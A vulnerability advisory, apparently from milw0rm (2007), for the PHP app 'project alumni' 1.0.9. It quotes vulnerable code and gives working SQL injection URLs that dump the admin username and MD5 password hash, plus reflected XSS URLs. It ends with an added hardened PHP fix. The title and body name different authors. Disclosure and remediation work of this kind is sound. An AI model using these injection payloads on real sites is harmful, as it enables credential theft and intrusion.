project alumni 1.0.9 Remote XSS SQL Injection Vulnerability by h3m4n

project-alumni sql injection & xss
author : tomplixsee
tomplixsee@yahoo.co.id

-----------------------------------------------------------------------------------------------------
affected software version       : project alumni v1.0.9, v1.0.8, or lower??
download                        : https://sourceforge.net/projects/project-alumni/


vulnerability
=============

1.sql injection
++++++++++++++++
condition: magic_quotes_gpc = off

vulnerable code on view.page.inc.php:
$result = dbQuery("SELECT * FROM `".getConfigVal("sqlTablePrefix",2)."_users` WHERE `alumniYear` = '".$_GET['year']."'");

reason: bad filtering
exploit:
http://victim/path/index.php?act=view&year=2003' union select 1,1,1,alumniUserName,1,alumniPassword,1,1,1,1,1,1,1,1,1,1,1,1,1 from alumni_users where ID='1

result example:
+-------------------------------------------------------+-----------------+
|      Name                                             |      Email      |
+-------------------------------------------------------+-----------------+
|      tomplixsee (1) f25a2fc72690b780b2a14e140ef6a9e0  |  Not Available  |
+-------------------------------------------------------+-----------------+
tomplixsee is the admin's username and f25a2fc72690b780b2a14e140ef6a9e0 is the MD5 hash of the admin's password.


vulnerable code on news.page.inc.php
$result = dbQuery("SELECT * FROM `".getConfigVal("sqlTablePrefix",2)."_class_news` WHERE `year` = '".$_GET['year']."'");

reason: bad filtering
exploit:
http://victim/path/index.php?act=news&year=2003' union select 1,2,3,4,5,6,alumniPassword,8,9 from alumni_users where ID='1

2.xss
++++++
vulnerable code:

________________________________________________________________________________
#/xml/index.php                                                                 #
#                                                                                #
#        <?php                                                                   #
#        if(isset($_GET["year"])){                                               #
#                $year = $_GET["year"];                                          #
#        }                                                                       #
#        if($year=='FRND')                                                       #
#                $yearText = "Friends of ".getConfigVal("schoolAbbr",2)." Alumni";   #
#        else                                                                    #
#                $yearText = "Class of $year";                                   #
#        ?>                                                                      #
#        .....                                                                   #
#        <?php echo"$yearText";?>                                                #
#        .....                                                                   #
#                                                                                #
#exploit:                                                                        #
#http://victim/path/xml/index.php?year=<xss>                                     #
#_______________________________________________________________________________#
# view.page.inc.php                                                              #
#                                                                                #
#        <?php if(!$_GET['year']) { ?>                                           #
#        ....                                                                    #
#        <?php } else if ($_GET['year'] < getConfigVal("alumniStartYear",2)) { ?>#
#        ....                                                                    #
#        <?php } else { ?>                                                       #
#        <h2>Alumni for the Graduating Year of <?php echo $_GET['year'] ?></h2>  #
#                                                                                #
#exploit                                                                         #
#http://victim/path/index.php?act=view&year=<xss>                                #
#_______________________________________________________________________________#
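Both bugs share one root cause: the `year` parameter is concatenated into SQL and echoed into HTML untouched. The following is an added example of a hardened handler for that parameter (not code from project alumni); it assumes a mysqli connection in `$db`, and reuses the application's own `getConfigVal()` helper as it appears in the snippets above. The same prepared-statement pattern applies to the `_class_news` query in news.page.inc.php.

```php
<?php
// Added example, not project alumni's code. Assumes $db is a mysqli
// connection and getConfigVal() is the application's config helper.

// Allow-list the parameter: a four-digit year in range, or the literal
// "FRND" that xml/index.php already treats specially. Anything else is
// rejected before it can reach SQL or HTML.
function validateYear(?string $raw, int $startYear): ?string {
    if ($raw === null) {
        return null;
    }
    if ($raw === 'FRND') {
        return $raw;
    }
    if (preg_match('/^\d{4}$/', $raw) !== 1) {
        return null;
    }
    $year = (int) $raw;
    return ($year >= $startYear && $year <= (int) date('Y')) ? (string) $year : null;
}

// Prepared statement: the value travels as a bound parameter, never as
// part of the SQL text, so the magic_quotes_gpc setting no longer matters.
function fetchAlumniByYear(mysqli $db, string $prefix, string $year): array {
    // The prefix is config, not user input, but identifiers cannot be
    // bound, so it is backtick-quoted with embedded backticks doubled.
    $table = '`' . str_replace('`', '``', $prefix) . '_users`';
    $stmt  = $db->prepare("SELECT * FROM $table WHERE `alumniYear` = ?");
    $stmt->bind_param('s', $year);
    $stmt->execute();
    return $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
}

// Output encoding: the heading is escaped for HTML, so even a value that
// slipped past validation cannot inject markup.
function yearHeading(string $year, string $schoolAbbr): string {
    $text = ($year === 'FRND') ? "Friends of $schoolAbbr Alumni" : "Class of $year";
    return '<h2>' . htmlspecialchars($text, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</h2>';
}

// Usage: reject bad input with a 400 instead of echoing it back.
$year = validateYear($_GET['year'] ?? null, (int) getConfigVal("alumniStartYear", 2));
if ($year === null) {
    http_response_code(400);
    exit('Invalid year');
}
$rows = fetchAlumniByYear($db, getConfigVal("sqlTablePrefix", 2), $year);
echo yearHeading($year, getConfigVal("schoolAbbr", 2));
```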


greetings to:
the sukabirus network kids, friends at stt telkom, the jasakom community,
sibalbal, crutz_ao, bidulux, akillers 179...........

# milw0rm.com [2007-11-24]
tomplixsee 11/24/2007